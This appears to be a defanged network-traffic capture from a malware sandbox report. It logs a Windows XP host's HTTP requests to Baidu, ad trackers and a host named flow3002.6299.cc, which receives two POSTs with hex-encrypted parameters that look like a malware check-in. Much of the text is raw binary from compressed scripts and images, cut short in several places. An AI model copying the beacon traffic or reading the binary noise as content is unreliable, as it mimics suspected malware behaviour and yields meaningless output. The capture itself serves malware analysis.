....hr1.ar9..._l...M~....8x1....*.:.z.g.. $..x[..h3.lL.v>B..H.f.P.@
"LjUk..Nc.x.5<......c&.*....[....b.I;t...1......m.RQ9sO;jiG....j...
..iI.|P>E{.....!(e....G..C'N.s:.m.VCC.Q......F...Sx....m...h.l..=.b
..8..j..i.[..W.4c...-^.......Il..vS^L<.R..j..[.....{....W...-Y^....
..Mjg..A..,7..V(.X......VxiEP.C......z...&(N.f..=E...V.D.g.~...l.Sp.!.
x.....ut.]..4...B..y.....;4C.`k.j}..Q..1..b..=Sb.9qhG...w[b.!^C=......
...Lz...m.U.......`..2.:.....y.F.q."....o...$&.6z...2P@..^........M...
5..&e..E.A./....5./.V%......9.....6..1.h.6...=..AA...y....=.QC{.J.@U;u
o.,[email protected]..&..$..}MI28h..........5...}...3[^.
.A...R7.ypK.98)..G8.6..v....X[.{bc.oi0..f`.........N.......>....o..
T.....Bz....w....6.JC`.....s..D.Z.....m...a..i...nC...n....t..2......$
w........./..!VZ.a ......7............ ......<x.-F......Ow[..!.....
. .hHC.}.....x.....&\....U{_.........0..S3........C.....h.........<<< skipped >>>

GET /nortb/hdt-ifocus/request/?id=PM1304281078&be_retarg=RE141201001 HTTP/1.1

Accept: */*

Referer: hXXp://fashion.ifeng.com/a/20150405/40098172_1.shtml

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; 360SE)

Cookie: force_preview=FT1504130011-4493-CT150407010

Connection: Keep-Alive

Host: adm.icast.cn


HTTP/1.1 200 OK

Server: nginx/1.5.8

Date: Thu, 16 Apr 2015 14:10:53 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 0

Connection: keep-alive

Set-Cookie: ic5=206fb9d40de09d96556900040cdace1f; domain=icast.cn; expires=Mon, 30-Dec-2999 16:00:00 GMT; path=/

P3P: CP=CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR

Cache-Control: no-store

HTTP/1.1 200 OK..Server: nginx/1.5.8..Date: Thu, 16 Apr 2015 14:10:53 
GMT..Content-Type: text/html; charset=utf-8..Content-Length: 0..Connec
tion: keep-alive..Set-Cookie: ic5=206fb9d40de09d96556900040cdace1f; do
main=icast.cn; expires=Mon, 30-Dec-2999 16:00:00 GMT; path=/..P3P: CP=
CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC N
OI DSP COR..Cache-Control: no-store..

GET /ps_default.gif?_t=1429193428648 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: t10.baidu.com

Connection: Keep-Alive

Cookie: BAIDUID=8C833062B6F97482CA56473B4B36B66F:FG=1; BIDUPSID=8C833062B6F97482CA56473B4B36B66F; H_PS_PSSID=13495_11077_1468_13464_13074_13382_12867_13322_12691_13411_10562_12722_12737_13439_13085_13325_13202_12835_13491_13162_8498


HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Content-Type: image/gif

ETag: "1792798031"

Accept-Ranges: bytes

Last-Modified: Mon, 28 Jul 2014 10:27:32 GMT

Content-Length: 43

Date: Thu, 16 Apr 2015 14:10:27 GMT

Server: lighttpd

GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Access-Con
trol-Allow-Origin: *..Content-Type: image/gif..ETag: "1792798031"..Acc
ept-Ranges: bytes..Last-Modified: Mon, 28 Jul 2014 10:27:32 GMT..Conte
nt-Length: 43..Date: Thu, 16 Apr 2015 14:10:27 GMT..Server: lighttpd..
GIF89a.............!.......,...........D..;..

GET /ps_default.gif?_t=1429193428663 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: t12.baidu.com

Connection: Keep-Alive

Cookie: H_PS_PSSID=13495_11077_1468_13464_13074_13382_12867_13322_12691_13411_10562_12722_12737_13439_13085_13325_13202_12835_13491_13162_8498


HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Content-Type: image/gif

ETag: "3881534169"

Accept-Ranges: bytes

Last-Modified: Mon, 28 Jul 2014 10:27:56 GMT

Content-Length: 43

Date: Thu, 16 Apr 2015 14:10:27 GMT

Server: lighttpd

GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Access-Con
trol-Allow-Origin: *..Content-Type: image/gif..ETag: "3881534169"..Acc
ept-Ranges: bytes..Last-Modified: Mon, 28 Jul 2014 10:27:56 GMT..Conte
nt-Length: 43..Date: Thu, 16 Apr 2015 14:10:27 GMT..Server: lighttpd..
GIF89a.............!.......,...........D..;..

POST /ClientAPI/flowtaskAPI.aspx HTTP/1.1

Accept: */*

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible)

Host: flow3002.6299.cc

Content-Length: 167

Cache-Control: no-cache

parems=3B6D427D39170CE5008F14C41F3933E7777ED11BE4AC5DE49967D124D13CEF98EF810CC1EC1C4239C27CCA4BBE161DF1A4F24C5DCF9EADA34220123F0C9A51B4183C709F4C234C79F447E3000E375424
HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 96

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Thu, 16 Apr 2015 14:10:20 GMT

32A45B4F6626435761CCBF7971D304AB3076C5A18E5564FC35BC8069371D182A7DDA4F
0F0924FF9486B9213262CCB928HTTP/1.1 200 OK..Cache-Control: private..Con
tent-Length: 96..Content-Type: text/html; charset=utf-8..Server: Micro
soft-IIS/7.5..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date
: Thu, 16 Apr 2015 14:10:20 GMT..32A45B4F6626435761CCBF7971D304AB3076C
5A18E5564FC35BC8069371D182A7DDA4F0F0924FF9486B9213262CCB928....

POST /ClientAPI/flowtaskAPI.aspx HTTP/1.1

Accept: */*

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible)

Host: flow3002.6299.cc

Content-Length: 167

Cache-Control: no-cache

parems=3B6D427D39170CE5008F14C41F3933E7777ED11BE4AC5DE49967D124D13CEF98EF810CC1EC1C4239C27CCA4BBE161DF1A4F24C5DCF9EADA34220123F0C9A51B4183C709F4C234C79F447E3000E375424
HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 96

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Thu, 16 Apr 2015 14:10:34 GMT

32A45B4F6626435761CCBF7971D304AB3076C5A18E5564FC35BC8069371D182A7DDA4F
0F0924FF9486B9213262CCB928..

GET /public03/pc.gif?_t=1429193428632 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: ecma.bdimg.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: JSP3/2.0.6

Date: Thu, 16 Apr 2015 14:10:28 GMT

Content-Type: image/gif

Content-Length: 43

Connection: close

ETag: b4491705564909da7f9eaf749dbbfbb1

Last-Modified: Sun, 14 Sep 2014 02:49:30 GMT

Expires: Fri, 17 Apr 2015 03:50:13 GMT

Age: 210013

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length

Accept-Ranges: bytes

x-bs-version: 4B3EE93785952E7D0ACF51FC91505D34

x-bs-request-id: MTAuMjE0LjM5LjQzOjgwODA6MjkzNjQ3MjQ4MTozMC9Ob3YvMjAxNCAxMTo1MDoxOCA=

x-bs-meta-crc32: 85354799

Content-MD5: b4491705564909da7f9eaf749dbbfbb1

x-bs-client-ip: MTE1LjIzMS40Mi4xOTU=

GIF89a.............!.......,...........D..;..

GET /r/www/cache/static/global/js/call-bdbrowser_97c84903.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&ch=&tn=baidu&bar=&wd=Ã„ÃÂ¾Â©Â»ÂªÃ‘Ã¯ÃŒÂ«Ã‘Ã´Ã„ÃœÃŽÂ¬ÃÃž&rn=&rsv_pq=d2904f7a0001a2af&rsv_t=42818soSHCj6OJ1V+D3jINfqWBpwgbzcx03vVt65ADB0W8InvHUTnZY4ek0&rsv_enter=1&inputT=29860

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s1.bdstatic.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:55 GMT

Content-Type: application/javascript

Content-Length: 1006

Connection: keep-alive

ETag: "7d3-51204ce9b32c0"

Last-Modified: Tue, 24 Mar 2015 08:45:39 GMT

Expires: Sat, 22 Mar 2025 04:55:10 GMT

Age: 1934145

Cache-Control: max-age=315360000

Accept-Ranges: bytes

Vary: Accept-Encoding,User-Agent

Content-Encoding: gzip

Ohc-Content-Crc: 978273652

Server: ld02-sys-jorcol01.ld02.baidu.com

CDN-AGE: 1
...........U.o.D...W$.*...q.n.T3Z%i.*v.....V.............=q.#G...'8...
.....y...c9.C...~.y.Y...%y.k..YQ......Y.1.S7b....(..........A..9 .....
p.J.#=u....%[email protected]*...../......p.|.e.*H....i.....E....gp,
Y$..n.u."mXV.......|.em............J)g...._...(.G...B0/....xMB..BDg...
...aW.Q6ke..)bfB.ynQi9.X...O0.....M..l..~J./..drq:.p..T2?.M.G]D.......
z.I.2!................?.....n....._.>......am9".......9..Vb.3..R.2.
!.3..W....2..P.r...)..J)$D.W....KZCPY../go.%.I.Z7C.u.D.h~.DQ.&...L.T=Z
.*..F1l .64<t.Y...?:[email protected].^^...`. .Z4r[.Kxv....-.....5w]...Dyyl
..............J..<........2>..=.?........^.>1.;P}R..l..a.....
.....D..0q.dV......u6i....k&..h.wG..^.S..e.4..Z.oe.....6%O.Y.Wi..m..o.
&...j...*...8...........mEg1.gvzR...9R...a.l;X._l..A..,^F.\r...G....j.
.u.>9.................u... ^...1..5.......J5%v`.^.}-..d...7.qo.tsL.
.....Q...8...R.\Q.?b.......G."....C.-<.....N.Vz..s....D....us..0 ..
..S....|.TC.).Z...*......l(T...@..!..c.H|..K...6Hb........VcU.a.n].[.a
"....T..".t.R...y.5.. ..v`C5...y._.\7..1.!.......

GET /passApi/js/uni_login_wrapper.js?cdnversion=1429193425851&_=1429193425101 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: passport.baidu.com

Connection: Keep-Alive

Cookie: BAIDUID=8C833062B6F97482CA56473B4B36B66F:FG=1; BIDUPSID=8C833062B6F97482CA56473B4B36B66F; H_PS_PSSID=13495_11077_1468_13464_13074_13382_12867_13322_12691_13411_10562_12722_12737_13439_13085_13325_13202_12835_13491_13162_8498


HTTP/1.1 200 OK

Content-Type: text/javascript

ETag: "4219043308"

Accept-Ranges: bytes

Last-Modified: Wed, 08 Apr 2015 05:56:32 GMT

Expires: Thu, 16 Apr 2015 14:20:21 GMT

Cache-Control: max-age=600

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Length: 1420

Date: Thu, 16 Apr 2015 14:10:21 GMT

Server: apache
......$U...Wmo.F.. [email protected].\[..r...Nj..}.l....4......,64.T....<
..3.....R..i.........&.V#........ZD.&I".%<..,.1....6(b"x..h..M.....
.`..Sw.b..2..2.....(......4MR.?.k....9..-.x*`.F...2..._.iB.5...@f..!.~
..........;`..%.R..`...'....#....,g.....>.........v ./sC.$..s.,....
.L....B.%.2...#9I.i...=N."[email protected]...;=...XyF ^2K...........53@(...
.~.P...^.<..1O..O...f.u.C......,......S.^Y.>0.t..(.VynK.U('....z
.g...e..M...<..|...J..`0..4KDB......sx.{.u{j.n... ../G..g.H.&.,.B93
..~r.3,U..7E..(Y.x...?...).8.}..9......a#..p3..C..~@<B=g.F. ......'
.l.LO0...,|..Q{.P.....`......"f.`....E.\%q..8E5:.............g.b#J.?."
..R..)...1.....).?......)!t..r........#.....;...|.....TR.>...=u..|B
.1.h...O.....1s....^.LI.p.zfG...xJ<<c.>....K..2-d7{@.8......~
.(MW........F.C...|.G..O....Fps|..\.Bb..O...l<....;v..Q.H.H..tT#:.p
....0..F...i.Q.8..a6&......m{H.0.....Q.s.%-.n..$ ............c..'SG..{
.[..C.y.)...=.s..:.9%.3..5V.3...... ......Qj...\.7..F...........Yi..T.
 ..P......P...>..;......L.>..\...'.Y.S..;..F..A|.=.N....J.>.~
d..d.....zJxl.C?.....M.&...bY.....S..?Ra......V.B..l...\...Xw.2.pu..#.
?K~H%Q. ..[...1...N.UfR.f,.L..<[email protected].".>.I&.P.r9&2
.._.4..Smh1....n.Q...ss...yp...[.....E.F.Y..e.,.5._.u.E..sE-.$V.... ..
lk.>._.m@[email protected][email protected].=.M...X....E..2....I.,......
^w.....ub.(..#.;.\....T...G.T.S...DH....`p.DheHR..a.d[..FkUZ......d.cX
..w..P.....)/.%dY5.e.'[email protected]_....{...9.Z.....gZk.M.\6.D.<[email protected]
8.#......<<< skipped >>>

GET /app.gif?&cna=0rC2DWbMLVwCASU5EL1qq92F HTTP/1.1

Accept: */*

Referer: hXXp://1.rwdns.com/zztj/yeshe.html

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Connection: Keep-Alive

Host: pcookie.cnzz.com


HTTP/1.1 200 OK

Server: Tengine

Date: Thu, 16 Apr 2015 14:10:29 GMT

Content-Type: image/gif

Content-Length: 43

Connection: keep-alive

P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"

Set-Cookie: cna=0rC2DWbMLVwCASU5EL1qq92F; expires=Sun, 13-Apr-25 14:10:29 GMT; path=/; domain=.cnzz.com

Expires: Thu, 01 Jan 1970 00:00:01 GMT

Cache-Control: no-cache

Pragma: no-cache

GIF89a.............!.......,...........L..;HTTP/1.1 200 OK..Server: Te
ngine..Date: Thu, 16 Apr 2015 14:10:29 GMT..Content-Type: image/gif..C
ontent-Length: 43..Connection: keep-alive..P3P: CP="NOI DSP COR CURa A
DMa DEVa PSAa PSDa OUR IND UNI PUR NAV"..Set-Cookie: cna=0rC2DWbMLVwCA
SU5EL1qq92F; expires=Sun, 13-Apr-25 14:10:29 GMT; path=/; domain=.cnzz
.com..Expires: Thu, 01 Jan 1970 00:00:01 GMT..Cache-Control: no-cache.
.Pragma: no-cache..GIF89a.............!.......,...........L..;..

GET /r/www/cache/static/jquery/jquery-1.10.2.min_f2fb5194.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s1.bdstatic.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:18 GMT

Content-Type: application/javascript

Content-Length: 32986

Connection: keep-alive

ETag: "16df0-51204ce9b32c0"

Last-Modified: Tue, 24 Mar 2015 08:45:39 GMT

Expires: Sat, 22 Mar 2025 04:54:58 GMT

Age: 1934120

Cache-Control: max-age=315360000

Accept-Ranges: bytes

Vary: Accept-Encoding,User-Agent

Content-Encoding: gzip

Ohc-Content-Crc: 396873407

Server: ld02-sys-jorcol01.ld02.baidu.com

CDN-AGE: 1
............kw.F.....B.x ...('.3...q..f....I2.................S..h....
.y.:...4...T...r..w..w...;[email protected].
yqu.LgIV&...>...l.z~....]\.e.PiT...|qT.<J..|&..t3.g.U.U..b{..2..
%U.>..]>V..~...d...'...<Z.fyF..k.\o.kuE.%z.Vt.f.......f.*.].i
v....u\~{..*.uRTw.2Z...J.F...I.)..,.9..,2j0..D..N.D....t........6....f
.|6..t..N.e.).Co...... .<:.erQ^l>..../n....m..1U{I..t...drqs....
.L~9.>........ x|..R.O...~@U/N....'...g.[<...6U.....>....)U.e
.nU ......3.....]\\.^....n7..y|.xv.....]@.~.N../.S\d.'..*6.v./.d.m....
LI...\.....Uyr...NO|...Sz../......aM..<.....w.^p...x>......iY%YR
l..2..^......`.....JP...$.....*[email protected]....~.?...7?...*..4.}....<.
..e..d...U.,PIwu..T.Bjs.T... .^.q.J.qv.gW.UES.Z..........E^..ut/.6\(.-
%-.....V..Cg.i...MU>z...^R..uZ... y.....MU.8..Od.........z.."B.IvU]
...3ss.}8..h.}.~...Ar..hIU/.n{..lz|......6....>...`A..^....3F?...w4
.....(.Zq6..n..d8.3Z.UR\%>...u\...o....T.uc......|....Z...sQ..X..A.
......k.....|........YE]......zpD.........t......N..W....d.k-KN.|.....
.Ws...i..........u.~>H..(..fZ.;Q.1Y..LqG..(w..9...*....L...;J..TM..
....F.z.cA...$..zK.....o..*.....K..`b...W...YQ.w.|.[...z....CU.\-t....
.`./..qz.&>tQ.!.............s).8c.'S^.I2%2Gt.p..m.Q..*r!.........."
y'..s......U.TBH$.....<....G;...5T.5.sV).3Q.,..fxPL.;..{c.._...zy'.
.. .Y.>..(.C.$.....e.`.B;4..;&.Y..E.......zF.......qu..y.'.t.NhW.U.
..........V.T....]...`..'.......n....` ..^.2/*.....\.....v.28..@.= `..
...v..Yd...p....Y;...-.nK.......,.......<_&qV...6.,*.........y.<<< skipped >>>

GET /r/www/cache/static/global/js/all_async_popstate1_0c1233e7.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s1.bdstatic.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:20 GMT

Content-Type: application/javascript

Transfer-Encoding: chunked

Connection: keep-alive

ETag: "2d3a7-513d41fbc9380"

Last-Modified: Thu, 16 Apr 2015 09:31:10 GMT

Expires: Sun, 13 Apr 2025 10:27:18 GMT

Age: 13382

Cache-Control: max-age=315360000

Accept-Ranges: bytes

Vary: Accept-Encoding,User-Agent

Content-Encoding: gzip

Ohc-Content-Crc: 3035242708

Server: ld02-sys-jorcol01.ld02.baidu.com

CDN-AGE: 1
2e4f..............{...u ...O...)BD..7I..^..#[.h....... A6.I....n..?;7;
^;N.d.I..M.l.?...l...K.]vG......s.*.@.....}.w.M.P.S.N.:..9.N...z..k..c
..M....h.*.&.N....k.01.g.}. .N.....U...5..........Mz|...-.egl9G\.3.w..
o........O..u...{e.j..m...3..'.>.I...............?....*...7....`kj(
X9...X.T8.F.x.......ti.M...a.......y.....7o?..p..7pb..[zpo...FA.......
..... p...cs..@...?*...a...7.G.....^'.u...!(...PG.;....v.:.&...9..<
'|...`..{....X.?...j.^..I....`./....c/.`....^.n.-.:......L1......v..!.
..e1?G8?...'...x.4...<N-...r..L.....6.aqG.N...<..1.1/;.~...D..HL
..&.......:.Ql,..e.P F...9.@#.7.j..?.4.9a.9.:n..k....v......C=....r..j
0...<;;.>.c..=z.......=xt..w......e.$,.....1.F.aV.%s...E.'\..0/1
...3.....O.....G..._.....#......I..d.$...y..)...bM...O...SX.........&l
t;*..Ag2.Fq..c......a.,..a....].i...2.;.{[email protected]..}/..C9w
.{e.....X. ~..3e.NS.`.....s.L.N}....DM$2N'......x.V.a7.$.rI.........x.
..~...G&...G..2$. U,..`.....X..r...... 5..3........N..qgGgg;...a...8..
...Aw2..=9.{.}g/.........A4.....{..KR...W.E......1....2..}L..8}......B
.......7...3..*.$..W.WI..-m..!\es...#'...a....R..l-...|.A).UCo<p:^.
V...^-..F..{W..............M.T W......o..VL.j...A. ..=.J]1.*.n..v.Z_.=
......E.........$.(W@...~....%[email protected]..&NK..;L.}..z.4|..5..d..
5.6.c.. .(...V.R..4J....y..H.8..SnBt..,6.T...7.q"jS....EU6...C..c..6&F
[email protected].$.L.m.[o#f...C3..mX........yZ....y........3...>.$...C.
...c.^.....3...2...K8M.d...|.2...!..M-....PB.oo.. ........A..e..T..g..
[.l.%fKPV....%...Fo#.&I7..,..........&O...i8#.mZ...^f%.3.33..m.7E.<<< skipped >>>

GET /r/www/cache/static/global/img/quickdelete_9c14b01a.png HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s1.bdstatic.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:21 GMT

Content-Type: image/png

Content-Length: 1100

Connection: keep-alive

ETag: "44c-51204ce9b32c0"

Last-Modified: Tue, 24 Mar 2015 08:45:39 GMT

Expires: Sat, 22 Mar 2025 04:55:01 GMT

Age: 1934120

Cache-Control: max-age=315360000

Accept-Ranges: bytes

Ohc-Content-Crc: 2409199083

Server: ld02-sys-jorcol01.ld02.baidu.com

CDN-AGE: 1
.PNG........IHDR..............so.....tEXtSoftware.Adobe ImageReadyq.e&
lt;..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:C67CB478534911E4B686C574
72C4EC9E" xmpMM:DocumentID="xmp.did:C67CB479534911E4B686C57472C4EC9E"&
gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:C67CB476534911E4B6
86C57472C4EC9E" stRef:documentID="xmp.did:C67CB477534911E4B686C57472C4
EC9E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
; <?xpacket end="r"?>I`r.....IDATx...... .E...rCB,.}..5......".!
w..u..IL...*>...`}[email protected]...#:}.w]W...1.
u...%`..y...{.........RJJ).h..y..CJ.Z.#.t5...I|[email protected]...
..c.~..K.q..D..ax.0....H7.......IEND.B`.....
<<< skipped >>>

GET /r/www/cache/static/sug/js/bdsug_547e5a10.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s1.bdstatic.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:21 GMT

Content-Type: application/javascript

Content-Length: 8936

Connection: keep-alive

ETag: "7a8c-513d41fbc9380"

Last-Modified: Thu, 16 Apr 2015 09:31:10 GMT

Expires: Sun, 13 Apr 2025 10:27:20 GMT

Age: 13381

Cache-Control: max-age=315360000

Accept-Ranges: bytes

Vary: Accept-Encoding,User-Agent

Content-Encoding: gzip

Ohc-Content-Crc: 907061286

Server: ld02-sys-jorcol01.ld02.baidu.com

CDN-AGE: 1
...........}k.#.q......5.m.`.....==...i.MR:[email protected]....<...|...
m....w..a;hY.8Q..............Y....K...i.tgeeeeeeefU....l....i].y.f....
.l....q......N}... .4...m.(..unO8...;i...b..2{..0.x.c...}bG...Q_..]rrB
...''..;a{..^?.....S......U..-.)l..(.%.4:.K.A.{..1..,.f.70H'H.{5wi.@..
F..ug.0..c7q....8...h...Y...(..Cb]............s...F..9I.$....d<..E2
.|.%.l...........KRZ.H.........7..D.\r..`3.mN........^6.h....sYyfV.d..
..{4i.. r{.......t....u=v....g....I.b.QRc..(..PG.o3..*...4.6...h.Z..5.
@.V.jc.j..?*..S..EI.i^......?.g....3........S.Q|..3....>...4.2.....
.%{.c..H..(.m4.......:......MD.......66..:!?.v....?mo8|..xgA.0j.....1r
g...........O.A.$.l....'.3jG..|..y.d~....$....D..........`..`n......A.
..c.g.`....P..0J} ~...6-H.:..}g......e>.I...3"fi......h>m.......
>.....o$.w...(..\..0..mX!....)7....y{1K'.(k......x..&A8D.X.t.....-.
.....C/.....7l.,....4..f.v..2...9..f...........O.~s......E...3G.od`...
...m.~........Jk0.}.\..... .....S..T.......a3P..............&. .:...m.
..........Z .2'm.W0..r......~.u.I.....!..%.`...sf..? L.<..<.....
[email protected]..."....B. 4r0..O.I..G..y........P.4......0.&5...
.;p....l....?x. ....g3.'q..s.4.....].L.a.q...... .[Uuo..w.....x..7kY.6
.7.........$.3.o.F..X.1.....v....2?.y.....r)|Jg.....F.;.../.C.o.......
\.....?....i..Y........SV.O.^..O.4.NX.zW8S.........n.K..l.={.$..5.h].}
..&....h.3/[email protected]..<.E.....i.0..;.("p)..Y..U..(
.\oW{^...e^...y.<:.. ...%..<.8...e...V.....r.......A_.I...-.P..I
..e...,.`....I..vv.... .`..D..d...|g....a..`v.4.a.v....;....}.}...<<< skipped >>>

GET /r/www/cache/static/plugins/every_cookie_09fe94e0.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s1.bdstatic.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:21 GMT

Content-Type: application/javascript

Content-Length: 5015

Connection: keep-alive

ETag: "36db-513d41fbc9380"

Last-Modified: Thu, 16 Apr 2015 09:31:10 GMT

Expires: Sun, 13 Apr 2025 10:27:15 GMT

Age: 13386

Cache-Control: max-age=315360000

Accept-Ranges: bytes

Vary: Accept-Encoding,User-Agent

Content-Encoding: gzip

Ohc-Content-Crc: 980911912

Server: ld02-sys-jorcol01.ld02.baidu.com

CDN-AGE: 1
...........;iw.6... d4...MY.........3.&N:.*z=....E*"%......XH...v.y..L
^.......V.......k..P.....U.x.......Iv=.....}r.e....y.....q~5`..6_a..O.
b.........z.a..L....z'6...X^.9n..6O........D4.9.....,.8.....j.........
[email protected](s....t.f.O...CS.^..r.oQ.M./n.<.:....."
.x..7...._..}.....4|K..=g.4.\M.A'..sw...Y. ..^g..<.9.l'..EB. [.[c@.
i...w...V`....v.8>..c.~.......Y\T...]. .........[..q......g..>..
k.....}......J^..A.|^.....#..7vR?]%......R...4o2.........{..M..x>Y.
...bL.....<.............6..).N8{/...-h....J.....F|.............GGc_
p.2-,s..>.?.5....N..1.vp..|g........g.....R%.],zb.....G....i[C".{.*
...J.D...by#. .S..4&X.....%..?..............C..........\Ca....~...L.T.
....:.d..9..qY..k&...-</y.Z....!s..a.lf....a..i.g...p^.`=.....Q.h.n
..[....U...LW...j. .'.l.Hx..}{.w./.Ywx..\g...r4...9.f.6...R.mf..z.R...
..u..<.K).=..y...y....(....#.[...c....`..EQ.I$.X...d....R..K.2..;w'
4I8.=AQ)t.|._d.{[email protected]... ....d.%.E....V:..m...`....o....)...6.D...
}....~"Xw..U..`.......}o.:zz......."...>.._...(N..."...-..=........
p.y..r.7..O8.F....on....<.B......NB/....o.`...)."&E..!.m~.i4c......
....... ...q.V.._.Kv..\.i....Pb....t."9...)&......i..B...{.g=..W..{...
...hf.yC".Q.L.'..S.[Z..=..J...2.^.0...<..dj.6....fr3T..Q).03bHN...g
..%........v.X.q$..#.N...8.%.....4...1.jk...5yLf<B...".WA...?k.....
pweg3`..d....$O..........^.P.t2.)Ub.......J.b6.J..tv.50.w...^Af..9N.,.
3...H...d./)...........8.&...l.U.J.../p.5..@ j...8d.0...8?.^Y...m.E...
....0V."..#l...b.&G.&E<..bg...iHzk..j........I.x.A.f.{..$.S.@&l<<< skipped >>>

GET /r/www/cache/static/plugins/env_5202315f.swf HTTP/1.1

